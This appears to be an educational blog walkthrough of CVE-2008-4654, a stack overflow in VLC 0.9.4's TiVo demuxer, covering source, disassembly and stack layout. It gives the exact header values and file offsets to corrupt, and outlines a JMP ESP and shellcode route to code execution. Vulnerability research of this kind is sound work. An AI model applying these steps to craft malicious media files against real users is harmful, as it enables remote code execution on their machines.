The following analysis details a stack buffer overflow in VLC versions up to and including 0.9.4. The source (for those who want to follow along) is available on my GitHub here.

* Following this analysis requires some understanding of Intel assembly and basic reverse engineering concepts.


This walkthrough is inspired by coursework from my Reverse Engineering and Vulnerability Analysis course at Johns Hopkins University. More information and credit for this vulnerability can be found on the NVD page for CVE-2008-4654.


Analysis of Source Code

The vulnerable function (parse_master) lives in vlc/vlc-0.9.4_src/modules/demux/ty.c and begins on line 1623 of that file. The relevant vulnerable portion of the function is provided below…

static void parse_master(demux_t *p_demux)
{
    demux_sys_t *p_sys = p_demux->p_sys;
    uint8_t mst_buf[32];
    int i, i_map_size;
    int64_t i_save_pos = stream_Tell(p_demux->s);
    int64_t i_pts_secs;

    /* Note that the entries in the SEQ table in the stream may have
       different sizes depending on the bits per entry.  We store them
       all in the same size structure, so we have to parse them out one
       by one.  If we had a dynamic structure, we could simply read the
       entire table directly from the stream into memory in place. */

    /* clear the SEQ table */
    free(p_sys->seq_table);

    /* parse header info */
    stream_Read(p_demux->s, mst_buf, 32);
    i_map_size = U32_AT(&mst_buf[20]);  /* size of bitmask, in bytes */
    p_sys->i_bits_per_seq_entry = i_map_size * 8;
    i = U32_AT(&mst_buf[28]);   /* size of SEQ table, in bytes */
    p_sys->i_seq_table_size = i / (8 + i_map_size);

    /* parse all the entries */
    p_sys->seq_table = malloc(p_sys->i_seq_table_size * sizeof(ty_seq_table_t));
    for (i=0; i<p_sys->i_seq_table_size; i++) {
        stream_Read(p_demux->s, mst_buf, 8 + i_map_size);
        p_sys->seq_table[i].l_timestamp = U64_AT(&mst_buf[0]);
        if (i_map_size > 8) {
            msg_Err(p_demux, "Unsupported SEQ bitmap size in master chunk");
            memset(p_sys->seq_table[i].chunk_bitmask, i_map_size, 0);
        } else {
            memcpy(p_sys->seq_table[i].chunk_bitmask, &mst_buf[8], i_map_size);
        }
    }

* The .dll which contains the compiled vulnerable source is in /vlc/vlc-0.9.4/plugins/libty_plugin.dll. Load this into IDA or an equivalent disassembler and you can peek into the assembly code as well.

Starting with the source, we see two variables of interest: mst_buf, declared as an array of 32 uint8_t (8-bit/1-byte unsigned) integers, and i_map_size, declared as a signed 32-bit integer.

uint8_t mst_buf[32];
int i, i_map_size;

Further in, we see the first of two stream_Read function calls. This first call reads 32 bytes into the mst_buf array declared above. What’s important to note here is that stream_Read takes data from a user-supplied source (namely, the chosen video file) and copies it into the buffer.

stream_Read(p_demux->s, mst_buf, 32);

An example video file, video.ty+ (a short TiVo recording), is provided and can be used as input. The parse_master function is called from the conditional displayed below (also located in the same ty.c file). Essentially, as VLC processes the user-supplied video file, if it encounters the 32-bit TIVO_PES_FILEID magic DWORD (0xf5467abd) it calls parse_master with p_demux as the parameter. p_demux is the demuxer object; its input stream (p_demux->s) is positioned at the magic DWORD, so the reads in parse_master consume the file's bytes STARTING with the magic DWORD.

Conditional which calls parse_master function when TIVO_PES_FILEID bytes are encountered.

if( U32_AT( &p_peek[ 0 ] ) == TIVO_PES_FILEID )
    {
        /* parse master chunk */
        parse_master(p_demux);
        return get_chunk_header(p_demux);
    }

Definition of TIVO_PES_FILEID DWORD

#define TIVO_PES_FILEID   ( 0xf5467abd )
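To locate candidate master chunks in a sample file outside of VLC, the same big-endian comparison can be run over a buffer holding the file's bytes. The following is a minimal sketch; find_master_chunk is a hypothetical helper (not part of ty.c), and unlike the demuxer, which only tests the bytes it is currently peeking at, it scans every offset the way a hex-editor search would.

```c
#include <stddef.h>
#include <stdint.h>

#define TIVO_PES_FILEID 0xf5467abdu

/* Hypothetical helper: returns the offset of the first big-endian
   TIVO_PES_FILEID in buf, or -1 if the magic does not occur. */
static long find_master_chunk(const uint8_t *buf, size_t len)
{
    for (size_t off = 0; off + 4 <= len; off++) {
        /* Assemble four bytes most-significant first, as U32_AT does. */
        uint32_t v = ((uint32_t)buf[off] << 24)
                   | ((uint32_t)buf[off + 1] << 16)
                   | ((uint32_t)buf[off + 2] << 8)
                   | buf[off + 3];
        if (v == TIVO_PES_FILEID)
            return (long)off;
    }
    return -1;
}
```

Calling find_master_chunk on the contents of a .ty+ file yields the offset at which the 32-byte master chunk header begins.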

Moving down, we see the variable i_map_size assigned the value U32_AT(&mst_buf[20]). As the U32_AT inline function shown below makes clear, this is a 4-byte big-endian integer built from the bytes starting at offset 20 of the mst_buf buffer. Given that mst_buf contains user-controlled data, i_map_size can be any arbitrary 4-byte integer.

static inline uint32_t U32_AT( const void * _p )
{
    const uint8_t * p = (const uint8_t *)_p;
    return ( ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16)
              | ((uint32_t)p[2] << 8) | p[3] );
}

In the second stream_Read call (located in the for loop) we see that 8 + i_map_size bytes are read from the input stream (the video file) into mst_buf. This should immediately raise a red flag: mst_buf is only 32 bytes wide, while i_map_size is supplied by the user and can be arbitrarily large (as a signed 32-bit integer, up to 2147483647/7FFFFFFFh).

for (i=0; i<p_sys->i_seq_table_size; i++) {
    stream_Read(p_demux->s, mst_buf, 8 + i_map_size);
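The missing check is easy to state in code. The sketch below is an illustration of the condition under which the read stays inside mst_buf; it is not the fix that VLC shipped, and seq_entry_overflows and MST_BUF_SIZE are names assumed here for the example.

```c
#include <stdbool.h>
#include <stdint.h>

#define MST_BUF_SIZE 32  /* sizeof(mst_buf) in parse_master */

/* Hypothetical check: true when reading 8 + i_map_size bytes would not
   fit in a 32-byte buffer. The sum is computed in 64 bits so that
   extreme values of i_map_size cannot wrap around. */
static bool seq_entry_overflows(int32_t i_map_size)
{
    int64_t entry_size = 8 + (int64_t)i_map_size;
    return entry_size < 0 || entry_size > MST_BUF_SIZE;
}
```

With the sample file's value of 2 the read is safe (10 bytes); any i_map_size above 24 writes past the end of the buffer.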

Using the provided video.ty+ file we can search (using a hex editor) for the magic bytes described earlier (f5 46 7a bd). One occurrence of this byte sequence is found at offset 0x00300000 in the video file. Moving 20 bytes past the start of the magic bytes (offset 0x00300014 in the file) we see the value “00 00 00 02”. This means that, for this particular sample file, i_map_size will be set to 2.
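The two header fields that matter for this analysis can be pulled out of the 32-byte master chunk header with a few lines of C. This is a sketch only: master_header_t and parse_master_header are hypothetical names, and read_be32 simply mirrors what U32_AT does in the VLC source.

```c
#include <stdint.h>

/* Big-endian 32-bit read, equivalent to VLC's U32_AT. */
static uint32_t read_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16)
         | ((uint32_t)p[2] << 8) | p[3];
}

/* Hypothetical container for the two fields parse_master relies on. */
typedef struct {
    uint32_t i_map_size;      /* header offset 20: bitmask size in bytes */
    uint32_t seq_table_bytes; /* header offset 28: SEQ table size in bytes */
} master_header_t;

/* hdr must point at the 32 bytes that start with the magic DWORD. */
static master_header_t parse_master_header(const uint8_t *hdr)
{
    master_header_t h;
    h.i_map_size = read_be32(hdr + 20);
    h.seq_table_bytes = read_be32(hdr + 28);
    return h;
}
```

Feeding it the 32 bytes at 0x00300000 of the sample file should report an i_map_size of 2, matching the hex-editor reading.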

Now that we see where we can affect the i_map_size variable and that the second stream_Read function can be used to overflow the mst_buf, let’s move to the disassembled code to get a better understanding of how many bytes are needed in order to overwrite the return address and take control of the instruction pointer.

Analysis of Disassembly

Once you’ve loaded libty_plugin.dll into IDA, you can search the available strings for the string “Unsupported SEQ bitmap size in master chunk” which we know resides in the parse_master function.

msg_Err(p_demux, "Unsupported SEQ bitmap size in master chunk");

This string is referenced somewhere in the middle of the parse_master function in the disassembled code (at address 0x61401CF8, i.e. sub_61401AE0+218h in the cross-reference below).

.rdata:61409158 aUnsupportedSeq db 'Unsupported SEQ bitmap size in master chunk',0
.rdata:61409158                                         ; DATA XREF: sub_61401AE0+218↑o

Once in the parse_master function we can identify the first stream_Read call (at address 0x61401C1F) and analyze the arguments being set up for the function call (shown below). Of note is the lea instruction, which loads the address esp+0FCh+var_3C into edx without dereferencing it (edx is then passed to stream_Read as the pointer to the mst_buf array). Since IDA defines var_3C as -3Ch, 0FCh+var_3C is equal to C0h. With this information, we know that the mst_buf array starts on the stack at esp+C0h and ends at esp+E0h (since the array is 32/20h bytes wide).

...
.text:61401C05                 mov     ecx, 20h ;move 32 into ecx
.text:61401C0A                 lea     edx, [esp+0FCh+var_3C] ; pointer to mst_buf array at ESP+C0
.text:61401C11                 mov     [esp+0FCh+var_F4], ecx ; 3rd param into stream_Read
.text:61401C15                 mov     [esp+0FCh+var_F8], edx ; 2nd param into stream_Read
.text:61401C19                 mov     edi, [eax+3Ch] ;pointer to p_demux input
.text:61401C1C                 mov     [esp+0FCh+Memory], edi ;input stream 1st param into stream_Read
.text:61401C1F                 call    stream_Read
...

Moving to the top of the function (at offset 0x61401AE0), we can examine the prologue (displayed below…)

.text:61401AE0                 push    ebp
.text:61401AE1                 xor     edx, edx
.text:61401AE3                 push    edi
.text:61401AE4                 xor     ebp, ebp
.text:61401AE6                 push    esi
.text:61401AE7                 xor     edi, edi
.text:61401AE9                 push    ebx
.text:61401AEA                 xor     esi, esi
.text:61401AEC                 sub     esp, 0ECh

As with any prologue, registers are being saved and room for local variables is being made on the stack. There are 4 pushes (registers being saved) and a sub instruction of ECh (room for local variables). Since we know mst_buf begins at esp+C0h and is 32 bytes in size, the end of this stack variable is at esp+E0h. Since ECh bytes were allocated for locals, another 12 (Ch) bytes of stack space sit between the end of mst_buf and the slot where EBX was pushed. Adding the 32 bytes taken by mst_buf, the 12 bytes of remaining local variable space, the 4 saved registers (4 bytes each, 16 in total) and the return address (4 bytes) that was pushed when parse_master was called gives 32 + 12 + 16 + 4 = 64 bytes that must be written, starting at mst_buf, to overwrite the return address.

A (crude) representation of the relevant stack items is shown below…

Stack Representation

Bytes  |  Data
…lower memory addresses…
32 Bytes  |  esp+C0h through esp+E0h which we know is mst_buf
12 Bytes  |  esp+E0h through esp+ECh which we know is the remaining local variable stack space
4 Bytes  |  push ebx moves DWORD value of EBX onto stack
4 Bytes  |  push esi moves DWORD value of ESI onto stack
4 Bytes  |  push edi moves DWORD value of EDI onto stack
4 Bytes  |  push ebp moves DWORD value of EBP onto stack
4 Bytes  |  Return Address saved onto stack when parse_master function is called
…higher memory addresses…
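The same arithmetic can be written down as a small C sketch so the numbers are easy to re-check against the disassembly. The constants come from the listing above; the enum and function names are assumptions made for this example.

```c
#include <stdint.h>

enum {
    FRAME_LOCALS   = 0xEC, /* sub esp, 0ECh */
    MST_BUF_OFFSET = 0xC0, /* 0FCh + var_3C, i.e. 0xFC - 0x3C */
    SAVED_REGS     = 4,    /* push ebp / edi / esi / ebx */
    SLOT_SIZE      = 4     /* one 32-bit stack slot */
};

/* Distance from the start of mst_buf to the first byte of the
   saved return address. */
static unsigned ret_addr_offset(void)
{
    return (FRAME_LOCALS - MST_BUF_OFFSET) + SAVED_REGS * SLOT_SIZE;
}

/* Bytes that must be written from the start of mst_buf so that the
   return address is fully covered. */
static unsigned bytes_to_cover_ret(void)
{
    return ret_addr_offset() + SLOT_SIZE;
}
```

ret_addr_offset() evaluates to 60 (3Ch) and bytes_to_cover_ret() to 64 (40h), which matches the table.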


From this representation you can see that we need to write 64 (40h) bytes into mst_buf to overwrite the return address. Since we know from the source code that the second stream_Read reads 8 + i_map_size bytes into mst_buf, we need to set i_map_size to 64 - 8 = 56 (38h).

stream_Read(p_demux->s, mst_buf, 8 + i_map_size);

Returning to our video.ty+ file, we can overwrite the bytes we know correspond to i_map_size with the values 00 00 00 38. Now, since the second stream_Read call occurs in a for loop, we want to ensure that it is only called once (so that additional data isn’t read into mst_buf). The for loop executes i_seq_table_size times, and i_seq_table_size is set to i / (8 + i_map_size), as we can see from the source file.

p_sys->i_seq_table_size = i / (8 + i_map_size);

Since we have set i_map_size to 56(38h) we need to set i to a value which will result in i_seq_table_size being 1 (remember we want the for loop to only execute once). We can see from the source that i is set to the value U32_AT(&mst_buf[28]).

i = U32_AT(&mst_buf[28]);

So, moving 8 bytes further into the .ty+ file (from header offset 20 to header offset 28) we reach the value that will ultimately be assigned to i. If we set the four bytes at mst_buf[28] to 40h (byte values 00 00 00 40) and the four bytes at mst_buf[20] to 38h (00 00 00 38), the for loop executes only once, since 64 / (8 + 56) = 1.
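The relationship between the two header fields and the loop count can be captured in a short sketch. The struct and function names here are hypothetical, unsigned 32-bit types are used for simplicity (the source declares both variables as int), and total_bytes is assumed to be at least 8.

```c
#include <stdint.h>

/* Hypothetical pair of header values: i_map_size goes at header
   offset 20, i at header offset 28. */
typedef struct {
    uint32_t i_map_size;
    uint32_t i;
} overflow_fields_t;

/* Choose the fields so that one stream_Read copies total_bytes bytes.
   Assumes total_bytes >= 8. */
static overflow_fields_t fields_for_write(uint32_t total_bytes)
{
    overflow_fields_t f;
    f.i_map_size = total_bytes - 8; /* read length is 8 + i_map_size */
    f.i = total_bytes;              /* makes i / (8 + i_map_size) == 1 */
    return f;
}

/* Same expression parse_master uses for i_seq_table_size. */
static uint32_t loop_iterations(overflow_fields_t f)
{
    return f.i / (8 + f.i_map_size);
}
```

For total_bytes = 64 this gives i_map_size = 56 (38h), i = 64 (40h) and exactly one loop iteration.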

Moving on, if we move to the 16th (64/4) DWORD counting from offset 0x00300020 of the video.ty+ file, which is file offset 0x0030005C (remember, the first stream_Read call consumed 32 bytes starting at the magic DWORD, so the second stream_Read starts at 0x00300020), we see the byte values 00 00 03 20. We now know from all our previous analysis that if we overwrite this value (and play the file in VLC), it will overwrite the return address on the stack, and when the return instruction executes at the end of the parse_master function, execution will continue at that address, which we now control! A graphic of the relevant bytes is provided below…

Video.ty+ Bytes
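The file offsets involved can be double-checked with a small sketch. It assumes the layout derived above (a 32-byte header followed directly by the bytes consumed by the second stream_Read, with the return address 60 bytes into that read); all function names are hypothetical.

```c
#include <stdint.h>

enum {
    HEADER_SIZE     = 32, /* bytes consumed by the first stream_Read */
    RET_ADDR_OFFSET = 60  /* return address position within the second read */
};

/* File offset of the i_map_size field (header offset 20). */
static uint32_t map_size_field_offset(uint32_t chunk_off)
{
    return chunk_off + 20;
}

/* File offset of the SEQ table size field (header offset 28). */
static uint32_t table_size_field_offset(uint32_t chunk_off)
{
    return chunk_off + 28;
}

/* File offset of the DWORD that lands on the saved return address. */
static uint32_t ret_addr_file_offset(uint32_t chunk_off)
{
    return chunk_off + HEADER_SIZE + RET_ADDR_OFFSET;
}

/* Store v at p as four big-endian bytes, the inverse of U32_AT. */
static void write_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24);
    p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);
    p[3] = (uint8_t)v;
}
```

With the master chunk at 0x00300000, the three offsets come out as 0x00300014, 0x0030001C and 0x0030005C respectively.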

Code Execution

With control over execution, we can follow the usual steps for arbitrary code execution: generate shellcode, add it to the input file so that it is written onto the stack immediately after the overwritten return address (as part of the mst_buf overflow, which means i_map_size and i must both grow by the length of the shellcode), then use the address of a JMP ESP instruction residing in libty_plugin.dll (or anywhere else one can be found in memory) as our new return address. Once parse_master returns, ESP points just past the return address, so the JMP ESP lands on our shellcode.


Feel free to message me if something here wasn’t clear (I admit I am prone to writing confusingly long sentences) and thanks for reading!